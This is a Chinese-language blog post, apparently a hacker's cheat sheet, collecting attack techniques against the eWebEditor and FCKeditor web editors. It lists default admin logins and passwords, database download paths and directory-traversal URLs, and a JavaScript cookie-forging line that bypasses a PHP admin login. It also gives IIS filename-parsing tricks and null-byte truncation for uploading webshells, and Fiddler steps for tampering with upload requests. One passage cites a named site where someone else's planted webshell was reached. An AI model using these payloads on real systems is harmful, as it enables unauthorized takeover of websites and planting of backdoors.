音乐

  1. Fields Of Gold - Sting
  2. Beautiful Girl - INXS
  3. Take Me To Church - Hozier
  4. Stephanie Says - Lady & Bird
  5. All of Me - John Legend
  6. 一丝不挂 - 陈奕迅
PHPTalk2.0 新版全新上线,欢迎体验

编辑器漏洞总结


###### 【 ewebeditor编辑器 】

    默认后台:ewebeditor/admin_login.asp

    帐号密码:admin admin

    样式设计:ewebeditor/admin_style.asp

    查看版本:ewebeditor/dialog/about.html

    数据库路径:db/ewebeditor.mdb    db/%23ewebeditor.mdb    db/%23ewebeditor.asp  ewebeditor/db/[email protected]#ewebeditor.asp (用谷歌语法找文件名)

    遍历目录:ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =../..

    跳转目录:ewebeditor/admin_uoloadfile.asp?id=14&dir=..  (dir为列目录, ..为返回上层目录),形式:dir ../.. 

    点上传文件管理-随便选择一个样式目录,得到:ewindoweditor/admin_uoloadfile.asp?id=14 在id=14后面加&dir=../../../.. 就可看到整个网站的文件了(../自己加减)

    ( ewebeditor5.5版本 )

    默认后台:ewebeditor/admin/login.asp

    帐号密码:admin  198625

    数据库路径:data/%23sze7xiaohu.mdb

    遍历目录:ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../

    调用样式上传页面:ewebeditor/ewebeditor.htm?id=body&style=popup

    ( ewebeditor3.8 php版本 )

    默认后台:eWebEditor/admin/login.php

    首先随便输入一个帐号和密码,接着系统会提示出错,这时清空浏览器的url,然后输入以下代码后连按三次回车键:

    javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1”));  

    接着访问文件:ewebeditor/admin/default.php  就可以直接进入后台了。

    ( ewebeditor编辑器exp手册 )

    有时候什么后缀都上传了,还是不行。就增加一个asp:jpg格式 上传asp:jpg 试试

    一:文件上传成功了,但是访问不成功,说明该目录(比如:/UploadFile)被设置了权限,返回去换成/ 上传到根目录就行了.增加asp等不行的时候,可以利用解析asp;jpg

    二:下载数据库查看前人留下的痕迹,再访问上传页面拿shell。

    页面路径:/ewebeditor.asp?id=48&style=popu7 用工具浏览数据库找到已添加asp|asa|cer|php的栏目,把S_ID跟S_Name的值替换在语句里访问,上传相对应的格式木马。

    =============================================================================================================================================================
【 fckeditor编辑器 】
    查看版本:fckeditor/editor/dialog/fck_about.html         

    编辑器页面:FCKeditor/_samples/default.html

    上传页面:fckeditor/editor/filemanager/connectors/test.html

    遍历目录:FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/

    编辑页面:fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

    查看文件上传路径:fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=

    ( 拿shell方法总结 )

    ASPX的站几乎都用fck编辑器,建议用工具扫一下,记住inc目录下可能存在fck编辑器,扫下这个目录。

    一:如果是iis6.0,上传两次 1.asp;.jpg 或者1.asp;1.jpg 或者创建x.asp目录,再在这个目录下上传x.jpg 或者直接上传1.asp;jpg 都可以完美解析拿下shell

    二:第一次上传1.asp;1.jpg,被重命名为:1_asp;1.jpg,但是第二次上传1.asp;1.jpg,就有可能变成:1.asp;1(1).jpg

    三:iis7.5+fck的解析文件为:a.aspx.a;.a.aspx.jpg..jpg.aspx

    四:如果不是iis6.0 上传1.asp;jpg然后抓包,接下来改包,将分号变成空格,再用c32把20改成00,保存,利用%00 截断分号两次

    五:成功访问别人的一句话木马页面,http://glavesoft.com/UploadFiles\EditorFile\file/2.asp;2(1).jpg  但不知道密码
    http://glavesoft.com/UploadFiles\EditorFile\file\2_asp;2.jpg 这个是图片木马,没有成功利用iis6.0解析漏洞还是图片,下载下来用记事本打开找到密码。

    六:IIS7.0/7.5 通杀oday,把php一句话木马后缀改成1.jpg传上去,找出一句话的路径后,在1.jpg的后面添加/.php  例如:/.php

    ( 建立文件夹 . 变 _ 的突破方法 )

    利用Fiddler web debugger 这款工具来进行修改数据包,从而达到突破的目的。

    注意:安装Fiddler web debugger,需要安装.net环境以及.net的SP2补丁方可运行!

    1.打开fck的上传页面,例如:fckeditor/editor/filemanager/browser/default/connectors/test.html

    2.再打开Fiddler web debugger这款工具,点击设置--自动断点--选择 “请求之前”

    3.接着打开fck的上传页面,创建文件夹,并输入你想要创建的文件名,例如:x.asp

    4.然后返回到Fiddler web debugger这款工具里,选择链接--点击右侧的嗅探

    5.修改currentfolder内的参数,改成你要建立的文件夹名字,如:x.asp

    6.然后点击右侧的:run to completion

    7.再点击软件设置--自动断点--禁用,再到浏览器里点击确定建立文件夹,你就会发现文件夹建立为x.asp了

    =============================================================================================================================================================